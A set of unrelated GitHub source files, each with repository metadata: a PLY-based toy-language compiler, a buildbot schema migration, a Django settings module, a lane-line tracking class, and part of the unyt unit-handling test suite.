constants = {'true':{'value':True, 'type':BOOL, 'dir':40001}, 'false':{'value':False, 'type':BOOL, 'dir':40000}, '-1':{'value':-1, 'type':INT, 'dir':42500}}
varGlobal = {}
varLocal = {}
funcGlobal = {}
funcParameters = []
variableType = None
funcType = None
lastVarName = None
lastFuncName = None
funcTypeNext = False
scope = 'global'
# Tokens
reserved = {
'module' : 'MODULE',
'main' : 'MAIN',
'func' : 'FUNC',
'print' : 'PRINT',
'read' : 'READ',
'if' : 'IF',
'else' : 'ELSE',
'elseif' : 'ELSEIF',
'true' : 'TRUE',
'false' : 'FALSE',
'void' : 'VOID',
'while' : 'WHILE',
'bool' : 'TBOOL',
'int' : 'TINT',
'float' : 'TFLOAT',
'string' : 'TSTRING',
'return' : 'RETURN'
}
tokens = [
'ASSIGN', 'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LESSTHAN', 'GREATERTHAN', 'LESSTHANEQ', 'GREATERTHANEQ', 'EQUAL', 'DIFFERENT', 'OR', 'AND',
'LEFTBKT', 'RIGHTBKT', 'LEFTSQBKT', 'RIGHTSQBKT', 'LEFTPAREN', 'RIGHTPAREN', 'COMMA', 'SEMICOLON',
'ID', 'NUMBERINT', 'NUMBERFLT', 'STRING'
] + list(reserved.values())
t_ASSIGN = r'='
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_LESSTHAN = r'\<'
t_GREATERTHAN = r'\>'
t_LESSTHANEQ = r'\<='
t_GREATERTHANEQ = r'\>='
t_EQUAL = r'=='
t_DIFFERENT = r'!='
t_OR = r'\|\|'
t_AND = r'&&'
t_LEFTBKT = r'\{'
t_RIGHTBKT = r'\}'
t_LEFTSQBKT = r'\['
t_RIGHTSQBKT = r'\]'
t_LEFTPAREN = r'\('
t_RIGHTPAREN = r'\)'
t_COMMA = r'\,'
t_SEMICOLON = r'\;'
t_NUMBERINT = r'[0-9]+'
t_NUMBERFLT = r'[0-9]+\.[0-9]+'
t_ignore = " \t"
def t_ID(t):
r'[a-z_][a-zA-Z0-9_]*'
t.type = reserved.get(t.value, 'ID')
return t
def t_STRING(t):
r'\".*\"'
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
print("Illegal character '%s'" % t.value[0])
t.lexer.skip(1)
# Build the lexer
import ply.lex as lex
lex.lex()
start = 'moduleg'
# For using empty
def p_empty(p):
'''empty :'''
pass
def p_functions(p):
'''functions : empty
| funcg functions'''
def p_globalVars(p):
'''globalVars : empty
| vars globalVars'''
def p_moduleg(p):
'''moduleg : MODULE ID LEFTBKT globalVars jumpToMain functions maing RIGHTBKT'''
def p_vars4(p):
'''vars4 : constant
| PLUS constant
| MINUS constant'''
p[0] = p[1]
if len(p) > 2:
p[0] = p[2]
if p[1] == '-':
p[0] = '-'+p[2]
def p_vars3(p):
'''vars3 : empty
| LEFTSQBKT cteN RIGHTSQBKT'''
if len(p) > 2:
convertVariableToArray(p[2])
def p_vars2(p):
'''vars2 : empty
| COMMA vars1'''
def p_vars1(p):
'''vars1 : ID addVariable vars3 ASSIGN vars4'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
if '-' in p[5]:
p[5] = p[5].replace('-','')
addQuadruple('*', constants['-1']['dir'], constants[p[5]]['dir'], var['dir'])
else:
addQuadruple('=', constants[p[5]]['dir'], '', var['dir'])
if getResultType(var['type'], '=', constants[p[5]]['type']) < 0:
print('Error: Assignment type mismatch')
exit(1)
def p_vars(p):
'''vars : type vars1 vars2 SEMICOLON'''
def p_func3(p):
'''func3 : empty
| RETURN expression funcReturn SEMICOLON
| statute func3'''
def p_func2(p):
'''func2 : empty
| statute func2'''
def p_func1(p):
'''func1 : VOID saveFuncTypeVoid ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func2 RIGHTBKT funcEnd
| funcTypeNext type ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func3 RIGHTBKT funcEnd'''
def p_funcg(p):
'''funcg : FUNC changeToLocalScope func1 changeToGlobalScope'''
def p_maing(p):
'''maing : MAIN changeToLocalScope completeJumpToMain block'''
addQuadruple('END', '', '', '')
print('-------- quadruples')
for i in range(0, len(quadruples)):
q = quadruples[i]
print('%s {var1:%s } {op:%s } {var2:%s } {result:%s }' % (i, q['var1'], q['op'], q['var2'], q['result']))
print('--------')
print('-------- stacks')
print(operandStack)
print(operationStack)
print(jumpStack)
print('--------')
print('global vars: %s' % varGlobal)
print('functions: %s' % funcGlobal)
print('constants: %s' % constants)
def p_block1(p):
'''block1 : empty
| statute block1'''
def p_block(p):
'''block : LEFTBKT block1 RIGHTBKT'''
def p_write(p):
'''write : PRINT LEFTPAREN cte RIGHTPAREN SEMICOLON'''
var = {}
if p[3] in varLocal.keys():
var = varLocal[p[3]]
elif p[3] in varGlobal.keys():
var = varGlobal[p[3]]
else:
var = constants[p[3]]
addQuadruple('PRINT', '', '', var['dir'])
def p_readg(p):
'''readg : READ LEFTPAREN ID RIGHTPAREN SEMICOLON'''
var = {}
if p[3] in varLocal.keys():
var = varLocal[p[3]]
else:
var = varGlobal[p[3]]
addQuadruple('READ', '', '', var['dir'])
def p_expression1(p):
'''expression1 : empty
| GREATERTHANEQ saveOperation exp
| LESSTHANEQ saveOperation exp
| GREATERTHAN saveOperation exp
| LESSTHAN saveOperation exp
| EQUAL saveOperation exp
| DIFFERENT saveOperation exp
| OR saveOperation exp
| AND saveOperation exp'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '<' or operationStack[-1] == '>' or operationStack[-1] == '<=' or operationStack[-1] == '>=' or operationStack[-1] == '==' or operationStack[-1] == '!=':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type'], operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar)
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Expression type mismatch')
exit(1)
p[0] = tempVar
def p_expression(p):
'''expression : exp expression1'''
def p_exp1(p):
'''exp1 : empty
| PLUS saveOperation exp exp1
| MINUS saveOperation exp exp1'''
p[0] = p[1]
if len(p) > 2:
p[0] = p[3]
def p_exp(p):
'''exp : term exp1'''
p[0] = p[1]
def p_term1(p):
'''term1 : empty
| TIMES saveOperation term term1
| DIVIDE saveOperation term term1'''
def p_term(p):
'''term : factor term1 termEnded'''
def p_factor1(p):
'''factor1 : constant
| PLUS constant
| MINUS constant'''
global operandStack
operand = {}
if len(p) == 3:
operand = getOperand(p[2])
if p[1] == '-':
resultType = getResultType(operand['type']%10, '*', INT)
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple('*', constants['-1']['dir'], operand, tempVar['dir'])
operand = tempVar
tempVarCount[resultType] += 1
else:
operand = getOperand(p[1])
operandStack.append(operand)
def p_factor(p):
'''factor : LEFTPAREN addFakeBottom expression RIGHTPAREN removeFakeBottom factorEnded
| factor1 factorEnded'''
def p_statute(p):
'''statute : call
| assignement
| vars
| condition
| readg
| write
| cycle'''
if p[1] is not None:
if p[1] != VOID:
print('Warning: Unused function return value.')
operandStack.pop()
def p_cycle(p):
'''cycle : WHILE whileStart LEFTPAREN expression RIGHTPAREN whileCheck block whileEnd'''
def p_call2(p):
'''call2 : empty
| COMMA expression addArgument call2'''
global argumentCount
if argumentCount != len(sendParams):
print('Error: Number of arguments doesn\'t match number of parameters declared')
exit(1)
if len(p) == 5:
argumentCount -= 1
argument = operandStack.pop()
parameter = sendParams.pop()
resultType = getResultType(parameter['type'], '=', argument['type'])
if resultType > 0:
addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
else:
print('Error: Argument type doesn\'t match the type of the parameter declared')
exit(1)
def p_call1(p):
'''call1 : empty
| expression addArgument call2'''
global argumentCount
if argumentCount != len(sendParams):
print('Error: Number of arguments doesn\'t match number of parameters declared')
exit(1)
if len(p) == 4:
argument = operandStack.pop()
parameter = sendParams.pop()
resultType = getResultType(parameter['type'], '=', argument['type'])
if resultType > 0:
addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
else:
print('Error: Argument type doesn\'t match the type of the parameter declared')
exit(1)
def p_call(p):
'''call : ID prepareParams LEFTPAREN call1 RIGHTPAREN SEMICOLON'''
argumentCount = 0
addQuadruple('GOFUNC', '', '', funcGlobal[p[1]]['startQuadruple'])
if funcGlobal[p[1]]['type'] != VOID:
operandStack.append(funcGlobal[p[1]])
p[0] = funcGlobal[p[1]]['type']
def p_prepareParams(p):
'''prepareParams : empty'''
global sendParams
addQuadruple('MEMORY', '', '', funcGlobal[p[-1]])
sendParams = funcGlobal[p[-1]]['parameters']
def p_addArgument(p):
'''addArgument : empty'''
global argumentCount
argumentCount += 1
def p_parameters1(p):
'''parameters1 : empty
| COMMA type ID addParameter parameters1'''
def p_parameters(p):
'''parameters : empty
| type ID addParameter parameters1'''
def p_constant1(p):
'''constant1 : empty
| COMMA cte constant1'''
def p_constant(p):
'''constant : cte
| LEFTSQBKT cte constant1 RIGHTSQBKT'''
if len(p) == 2:
p[0] = p[1]
def p_cte(p):
'''cte : ID
| varArr
| TRUE
| FALSE
| cteN
| cteS'''
p[0] = p[1]
def p_cteN(p):
'''cteN : NUMBERINT addConstant
| NUMBERFLT addConstant'''
p[0] = p[1]
def p_cteS(p):
'''cteS : STRING'''
cte = p[1]
if '\"' in cte:
cte = cte.replace('\"','')
global constants
if not cte in constants.keys():
constants[cte] = {'value':cte, 'type':STRING, 'dir':constVarCount[STRING]}
constVarCount[STRING] += 1
p[0] = cte
def p_condition2(p):
'''condition2 : empty ifEnd
| ELSE block ifEnd'''
def p_condition1(p):
'''condition1 : empty
| ELSEIF LEFTPAREN expression RIGHTPAREN ifStart2 block ifContinue condition1'''
def p_condition(p):
'''condition : IF LEFTPAREN expression RIGHTPAREN ifStart block ifContinue condition1 condition2'''
def p_assignement2(p):
'''assignement2 : call
| expression SEMICOLON'''
if p[1] == VOID:
print('Error: Cannot assign a function of type void.')
exit(1)
def p_assignement1(p):
'''assignement1 : ID
| varArr'''
p[0] = p[1]
if not p[1] in varLocal.keys() and not p[1] in varGlobal.keys():
print('Error: Cannot assign undeclared variable')
exit(1)
def p_assignement(p):
'''assignement : assignement1 ASSIGN assignement2'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
operand = operandStack.pop()
resultType = getResultType(var['type'], '=', operand['type']%10)
if resultType > 0:
addQuadruple('=', operand['dir'], '', var['dir'])
else:
print('Error: Assignment type mismatch')
exit(1)
def p_varArr(p):
'''varArr : ID LEFTSQBKT exp RIGHTSQBKT'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
print('vararr')
print(var)
def p_type(p):
'''type : TBOOL addType
| TINT addType
| TFLOAT addType
| TSTRING addType'''
# extra grammar
def p_addVariable(p):
'''addVariable : empty'''
global lastVarName
lastVarName = p[-1]
variableName = lastVarName
addVariable(variableName, variableType)
def p_addConstant(p):
'''addConstant : empty'''
constType = -1
cte = num(p[-1])
if type(cte) is int:
constType = INT
else:
constType = FLOAT
global constants
if not str(cte) in constants.keys():
constants[str(cte)] = {'value':cte, 'type':constType, 'dir':constVarCount[constType]}
constVarCount[constType] += 1
def p_saveFuncName(p):
'''saveFuncName : empty'''
global lastFuncName
lastFuncName = p[-1]
def p_funcTypeNext(p):
'''funcTypeNext : empty'''
global funcTypeNext
funcTypeNext = True
def p_saveFuncTypeVoid(p):
'''saveFuncTypeVoid : empty'''
global funcType
funcType = VOID
def p_addParameter(p):
'''addParameter : empty'''
global lastVarName
global funcParameters
lastVarName = p[-1]
variableName = lastVarName
addVariable(variableName, variableType)
funcParameters.append(varLocal[variableName])
def p_addType(p):
'''addType : empty'''
global variableType
global funcTypeNext
global funcType
if funcTypeNext:
funcType = getTypeValue(p[-1])
else:
variableType = getTypeValue(p[-1])
funcTypeNext = False
def p_saveOperation(p):
'''saveOperation : empty'''
global operationStack
operationStack.append(p[-1])
def p_termEnded(p):
'''termEnded : empty'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '+' or operationStack[-1] == '-' or operationStack[-1] == '||':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type']%10, operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Term type mismatch')
exit(1)
p[0] = "hio"
def p_factorEnded(p):
'''factorEnded : empty'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '*' or operationStack[-1] == '/' or operationStack[-1] == '&&':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type']%10, operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Factor type mismatch')
exit(1)
def p_addFakeBottom(p):
'''addFakeBottom : empty'''
global operationStack
operationStack.append('(')
def p_removeFakeBottom(p):
'''removeFakeBottom : empty'''
global operationStack
operationStack.pop()
def p_changeToLocalScope(p):
'''changeToLocalScope : empty'''
global scope
scope = 'local'
def p_changeToGlobalScope(p):
'''changeToGlobalScope : empty'''
global scope
scope = 'global'
def p_ifStart(p):
'''ifStart : empty'''
jumpStack.append('IF')
p_ifStart2(p)
def p_ifStart2(p):
'''ifStart2 : empty'''
condition = operandStack.pop()
if condition['type'] == BOOL:
addQuadruple('GOTOF', condition, '', '')
jumpStack.append(len(quadruples)-1)
else:
print('Error: Condition in \'if\' statement must evaluate to a bool.')
exit(1)
def p_ifContinue(p):
'''ifContinue : empty'''
addQuadruple('GOTO', '', '', '')
complete = jumpStack.pop()
jumpStack.append(len(quadruples)-1)
completeQuadruple(complete, len(quadruples))
def p_ifEnd(p):
'''ifEnd : empty'''
while jumpStack[-1] != 'IF':
completeQuadruple(jumpStack.pop(), len(quadruples))
jumpStack.pop()
def p_whileStart(p):
'''whileStart : empty'''
jumpStack.append(len(quadruples))
def p_whileCheck(p):
'''whileCheck : empty'''
condition = operandStack.pop()
if condition['type'] == BOOL:
addQuadruple('GOTOF', condition, '', '')
jumpStack.append(len(quadruples)-1)
else:
print('Error: Condition in \'if\' statement must evaluate to a bool.')
exit(1)
def p_whileEnd(p):
'''whileEnd : empty'''
complete = jumpStack.pop()
addQuadruple('GOTO', '', '', jumpStack.pop())
completeQuadruple(complete, len(quadruples))
def p_jumpToMain(p):
'''jumpToMain : empty'''
addQuadruple('GOTO', '', '', '')
jumpStack.append(len(quadruples)-1)
def p_completeJumpToMain(p):
'''completeJumpToMain : empty'''
completeQuadruple(jumpStack.pop(), len(quadruples))
def p_funcStart(p):
'''funcStart : empty'''
addFunction(lastFuncName, funcType, len(quadruples))
def p_funcReturn(p):
'''funcReturn : empty'''
print('return')
print(p[-1])
value = operandStack.pop()
if value['type'] == funcGlobal[lastFuncName]['type']:
addQuadruple('RETURN', '', '', value['dir'])
else:
print('Error: Type of return value in function doesn\'t match function\'s declared type.')
exit(1)
def p_funcEnd(p):
'''funcEnd : empty'''
funcGlobal[lastFuncName]['parameters'] = funcParameters
print('local vars: %s' % varLocal)
resetLocalCounters()
addQuadruple('ENDFUNC', '', '', '')
def p_error(p):
if p:
print("Syntax error at '%s'" % p)#p.value)
else:
print("Syntax error at EOF")
exit(1)
import ply.yacc as yacc
yacc.yacc()
#Functions
def addVariable(variable, varType):
global varGlobal
global varLocal
if variable in funcGlobal.keys():
print("Variable error: Variable cannot have the same name as a function")
exit(1)
if scope == 'global':
if not variable in varGlobal.keys():
varGlobal[variable] = {'name':variable, 'type':varType, 'dir':globalVarCount[varType]}
globalVarCount[varType] += 1
else:
print("Variable error: Variable is already declared globally")
exit(1)
else:
if not variable in varLocal.keys():
varLocal[variable] = {'name':variable, 'type':varType, 'dir':localVarCount[varType]}
localVarCount[varType] += 1
else:
print("Variable error: Variable is already declared locally")
exit(1)
def convertVariableToArray(size):
global varGlobal
global varLocal
if scope == 'global':
varGlobal[lastVarName]['type'] *= 11
varGlobal[lastVarName]['size'] = size
else:
varLocal[lastVarName]['type'] *= 11
varLocal[lastVarName]['size'] = size
def addFunction(name, funType, startQuadruple):
global funcGlobal
if name in varGlobal.keys():
print("Function error: Function cannot have the same name as a variable")
exit(1)
if not name in funcGlobal.keys():
funcGlobal[name] = {'name':name, 'type':funType, 'startQuadruple':startQuadruple, 'boolCount':localVarCount[BOOL], 'intCount':localVarCount[INT], 'floatCount':localVarCount[FLOAT], 'stringCount':localVarCount[STRING], 'boolTempCount':tempVarCount[BOOL], 'intTempCount':tempVarCount[INT], 'floatTempCount':tempVarCount[FLOAT], 'stringTempCount':tempVarCount[STRING]}
if funType != 0:
funcGlobal[name]['dir'] = globalVarCount[funType]
globalVarCount[funType] += 1
else:
print("Function error: Function is already declared")
exit(1)
def addQuadruple(operation, var1, var2, result):
global quadruples
quadruples.append({'op':operation, 'var1':var1, 'var2':var2, 'result':result})
def completeQuadruple(index, newValue):
quadruples[index]['result'] = newValue
def num(s):
try:
return int(s)
except ValueError:
return float(s)
def getOperand(key):
if key in constants.keys():
return constants[key]
elif key in varLocal.keys():
return varLocal[key]
elif key in varGlobal.keys():
return varGlobal[key]
def resetLocalCounters():
global varLocal
global funcParameters
global localVarCount
global tempVarCount
varLocal = {}
funcParameters = []
localVarCount[BOOL] = 20000
localVarCount[INT] = 22500
localVarCount[FLOAT] = 25000
localVarCount[STRING] = 27500
tempVarCount[BOOL] = 30000
tempVarCount[INT] = 32500
tempVarCount[FLOAT] = 35000
tempVarCount[STRING] = 37500
# Main
if __name__ == '__main__':
# Check for file
if (len(sys.argv) > 1):
file = sys.argv[1]
# Open file
try:
f = open(file, 'r')
data = f.read()
f.close()
# Parse the data
if (yacc.parse(data, tracking = True) == 'OK'):
print(dirProc);
executeVirtualMachine(funcGlobal, quadruples, constants)
except EOFError:
print(EOFError)
else:
print('File missing')
while 1:
try:
s = raw_input('')
except EOFError:
break
if not s:
continue
yacc.parse(s)
| {
"content_hash": "65ecc0d547b366b6bcebeca7a1b1b66e",
"timestamp": "",
"source": "github",
"line_count": 806,
"max_line_length": 367,
"avg_line_length": 25.325062034739453,
"alnum_prop": 0.6660297864001568,
"repo_name": "sanchezz93/Giga-Compiler",
"id": "eed121529964593afe8075d28ac5d2c7875b8242",
"size": "20412",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Entrega 5/Giga.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11375"
},
{
"name": "CSS",
"bytes": "693534"
},
{
"name": "Emacs Lisp",
"bytes": "12050"
},
{
"name": "HTML",
"bytes": "7963199"
},
{
"name": "JavaScript",
"bytes": "118328003"
},
{
"name": "Python",
"bytes": "2269416"
},
{
"name": "Shell",
"bytes": "33230"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import print_function
import sqlalchemy as sa
from buildbot.util import sautils
def upgrade(migrate_engine):
metadata = sa.MetaData()
metadata.bind = migrate_engine
schedulers_table = sautils.Table('schedulers', metadata, autoload=True)
enabled = sa.Column('enabled', sa.SmallInteger,
nullable=False, server_default="1")
enabled.create(schedulers_table)
| {
"content_hash": "fb79ed353335e9a66e39a51a5a3fd0ee",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 75,
"avg_line_length": 30.466666666666665,
"alnum_prop": 0.7045951859956237,
"repo_name": "Alecto3-D/testable-greeter",
"id": "9ab6e77806fbe69fff4459af2e53faafaeb633b6",
"size": "1161",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "bb-master/sandbox/lib/python3.5/site-packages/buildbot/db/migrate/versions/049_add_schedulers_enabled.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1340"
},
{
"name": "JavaScript",
"bytes": "6003191"
},
{
"name": "Makefile",
"bytes": "7521"
},
{
"name": "Python",
"bytes": "4833445"
},
{
"name": "RAML",
"bytes": "62192"
},
{
"name": "Shell",
"bytes": "3682"
}
],
"symlink_target": ""
} |
from .base import *
from ._ci import *
from ._admin import *
| {
"content_hash": "c44d2a7580773396a4514bc964f90bc8",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.6721311475409836,
"repo_name": "sunForest/AviPost",
"id": "daa423fd08597b4898f69a46783f0f98b51c74c7",
"size": "61",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "avipost/avipost/settings/ci_admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Gherkin",
"bytes": "3188"
},
{
"name": "Python",
"bytes": "35993"
},
{
"name": "Shell",
"bytes": "2516"
}
],
"symlink_target": ""
} |
import numpy as np
class Line():
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
#polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
self.k = 5
self.last_fits = []
self.radius_of_curvature = []
self.line_base_pos = []
for i in range(self.k):
self.last_fits.append(None)
self.radius_of_curvature.append(None)
self.line_base_pos.append(None)
self.temp_fit = [np.array([False])]
self.init = True
self.temp_counter = 0
def add_stats(self, detected, fit, curvature, distance):
self.detected = detected
if self.detected:
self.current_fit = fit
self.last_fits.append(fit)
self.radius_of_curvature.append(curvature)
self.line_base_pos.append(distance)
if self.init:
self.init = False
self.temp_fit = fit
else:
self.temp_fit = self.temp_fit*0.8 + fit*0.2
else:
self.last_fits.append(None)
self.radius_of_curvature.append(None)
self.line_base_pos.append(None)
self.temp_counter += 1
if self.temp_counter == 5:
self.temp_counter = 0
self.init = True
self.last_fits = self.last_fits[1:]
self.radius_of_curvature = self.radius_of_curvature[1:]
self.line_base_pos = self.line_base_pos[1:]
def get_best_fit(self):
temp = np.zeros([3])
curv = 0
dist = 0
count = 0
for i in range(self.k):
if self.last_fits[i] is not None:
temp += self.last_fits[i]
curv += self.radius_of_curvature[i]
dist += self.line_base_pos[i]
count += 1
'''
if count == 0:
return None
else:
return (temp/float(count), curv/float(count), dist/float(count))
'''
if self.init:
return None
else:
return (self.temp_fit, curv/float(count), dist/float(count))
| {
"content_hash": "095da3ddbbc7ba8449f498c9fc647f48",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 76,
"avg_line_length": 31.12676056338028,
"alnum_prop": 0.5158371040723982,
"repo_name": "camigord/Self-Driving-Car-Nanodegree",
"id": "64bb054a10c1a450abbcd531553c716d9bef8b54",
"size": "2210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "P4-Advanced-Lane-Finding/utils/Line.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1139723"
},
{
"name": "Jupyter Notebook",
"bytes": "16877239"
},
{
"name": "Python",
"bytes": "51094"
}
],
"symlink_target": ""
} |
"""
Test symbolic unit handling.
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2018, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the LICENSE file, distributed with this software.
# -----------------------------------------------------------------------------
import operator
import pickle
import numpy as np
import pytest
from numpy.testing import (
assert_allclose,
assert_almost_equal,
assert_array_almost_equal_nulp,
assert_equal,
)
from sympy import Symbol
import unyt.unit_symbols as unit_symbols
from unyt._physical_ratios import (
m_per_km,
m_per_mpc,
m_per_pc,
mass_sun_kg,
sec_per_year,
)
from unyt._unit_lookup_table import (
default_unit_symbol_lut,
name_alternatives,
unit_prefixes,
)
from unyt.array import unyt_quantity
from unyt.dimensions import (
energy,
length,
magnetic_field_cgs,
magnetic_field_mks,
mass,
power,
rate,
temperature,
time,
)
from unyt.exceptions import InvalidUnitOperation, UnitConversionError, UnitsNotReducible
from unyt.testing import assert_allclose_units
from unyt.unit_object import Unit, UnitParseError, default_unit_registry
from unyt.unit_registry import UnitRegistry
from unyt.unit_systems import UnitSystem, cgs_unit_system
def test_no_conflicting_symbols():
"""
Check unit symbol definitions for conflicts.
"""
full_set = set(default_unit_symbol_lut.keys())
# go through all possible prefix combos
for symbol in default_unit_symbol_lut.keys():
if default_unit_symbol_lut[symbol][4]:
keys = unit_prefixes.keys()
else:
keys = [symbol]
for prefix in keys:
new_symbol = f"{prefix}{symbol}"
# test if we have seen this symbol
assert new_symbol not in full_set, f"Duplicate symbol: {new_symbol}"
full_set.add(new_symbol)
def test_dimensionless():
"""
Create dimensionless unit and check attributes.
"""
u1 = Unit()
assert u1.is_dimensionless
assert u1.expr == 1
assert u1.base_value == 1
assert u1.dimensions == 1
assert u1 != "hello!"
assert (u1 == "hello") is False
u2 = Unit("")
assert u2.is_dimensionless
assert u2.expr == 1
assert u2.base_value == 1
assert u2.dimensions == 1
assert_equal(u1.latex_repr, "")
assert_equal(u2.latex_repr, "")
def test_create_from_string():
"""
Create units with strings and check attributes.
"""
u1 = Unit("kg * m**2 * s**-2")
assert u1.dimensions == energy
assert u1.base_value == 1.0
# make sure order doesn't matter
u2 = Unit("m**2 * s**-2 * kg")
assert u2.dimensions == energy
assert u2.base_value == 1.0
# Test rationals
u3 = Unit("kg**0.5 * m**-0.5 * s**-1")
assert u3.dimensions == magnetic_field_cgs
assert u3.base_value == 1.0
# sqrt functions
u4 = Unit("sqrt(kg)/sqrt(m)/s")
assert u4.dimensions == magnetic_field_cgs
assert u4.base_value == 1.0
# commutative sqrt function
u5 = Unit("sqrt(kg/m)/s")
assert u5.dimensions == magnetic_field_cgs
assert u5.base_value == 1.0
# nonzero CGS conversion factor
u6 = Unit("Msun/pc**3")
assert u6.dimensions == mass / length**3
assert_array_almost_equal_nulp(
np.array([u6.base_value]), np.array([mass_sun_kg / m_per_pc**3])
)
with pytest.raises(UnitParseError):
Unit("m**m")
with pytest.raises(UnitParseError):
Unit("m**g")
with pytest.raises(UnitParseError):
Unit("m+g")
with pytest.raises(UnitParseError):
Unit("m-g")
with pytest.raises(UnitParseError):
Unit("hello!")
with pytest.raises(UnitParseError):
Unit("True")
with pytest.raises(UnitParseError):
Unit("else")
with pytest.raises(UnitParseError):
Unit("hello(37)")
with pytest.raises(UnitParseError):
Unit("hello(foo=37)")
cm = Unit("cm")
data = 1 * cm
assert Unit(data) == cm
assert Unit(b"cm") == cm
def test_create_from_expr():
"""
Create units from sympy Exprs and check attributes.
"""
pc_mks = m_per_pc
yr_mks = sec_per_year
# Symbol expr
s1 = Symbol("pc", positive=True)
s2 = Symbol("yr", positive=True)
# Mul expr
s3 = s1 * s2
# Pow expr
s4 = s1**2 * s2 ** (-1)
u1 = Unit(s1)
u2 = Unit(s2)
u3 = Unit(s3)
u4 = Unit(s4)
assert u1.expr == s1
assert u2.expr == s2
assert u3.expr == s3
assert u4.expr == s4
assert_allclose_units(u1.base_value, pc_mks, 1e-12)
assert_allclose_units(u2.base_value, yr_mks, 1e-12)
assert_allclose_units(u3.base_value, pc_mks * yr_mks, 1e-12)
assert_allclose_units(u4.base_value, pc_mks**2 / yr_mks, 1e-12)
assert u1.dimensions == length
assert u2.dimensions == time
assert u3.dimensions == length * time
assert u4.dimensions == length**2 / time
def test_create_with_duplicate_dimensions():
"""
Create units with overlapping dimensions. Ex: km/Mpc.
"""
u1 = Unit("J * s**-1")
u2 = Unit("km/s/Mpc")
km_mks = m_per_km
Mpc_mks = m_per_mpc
assert u1.base_value == 1
assert u1.dimensions == power
assert_allclose_units(u2.base_value, km_mks / Mpc_mks, 1e-12)
assert u2.dimensions == rate
def test_create_new_symbol():
"""
Create unit with unknown symbol.
"""
u1 = Unit("abc", base_value=42, dimensions=(mass / time))
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == mass / time
u1 = Unit("abc", base_value=42, dimensions=length**3)
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == length**3
u1 = Unit("abc", base_value=42, dimensions=length * (mass * length))
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == length**2 * mass
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length**length)
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length ** (length * length))
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length - mass)
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length + mass)
def test_create_fail_on_unknown_symbol():
"""
Fail to create unit with unknown symbol, without base_value and dimensions.
"""
with pytest.raises(UnitParseError):
Unit(Symbol("jigawatts"))
def test_create_fail_on_bad_symbol_type():
"""
Fail to create unit with bad symbol type.
"""
with pytest.raises(UnitParseError):
Unit([1]) # something other than Expr and str
def test_create_fail_on_bad_dimensions_type():
"""
Fail to create unit with bad dimensions type.
"""
with pytest.raises(UnitParseError):
Unit("a", base_value=1, dimensions="(mass)")
def test_create_fail_on_dimensions_content():
"""
Fail to create unit with bad dimensions expr.
"""
a = Symbol("a")
with pytest.raises(UnitParseError):
Unit("a", base_value=1, dimensions=a)
def test_create_fail_on_base_value_type():
"""
Fail to create unit with bad base_value type.
"""
with pytest.raises(UnitParseError):
Unit("a", base_value="a", dimensions=(mass / time))
def test_string_representation():
"""
Check unit string representation.
"""
pc = Unit("pc")
Myr = Unit("Myr")
speed = pc / Myr
dimensionless = Unit()
assert str(pc) == "pc"
assert str(Myr) == "Myr"
assert str(speed) == "pc/Myr"
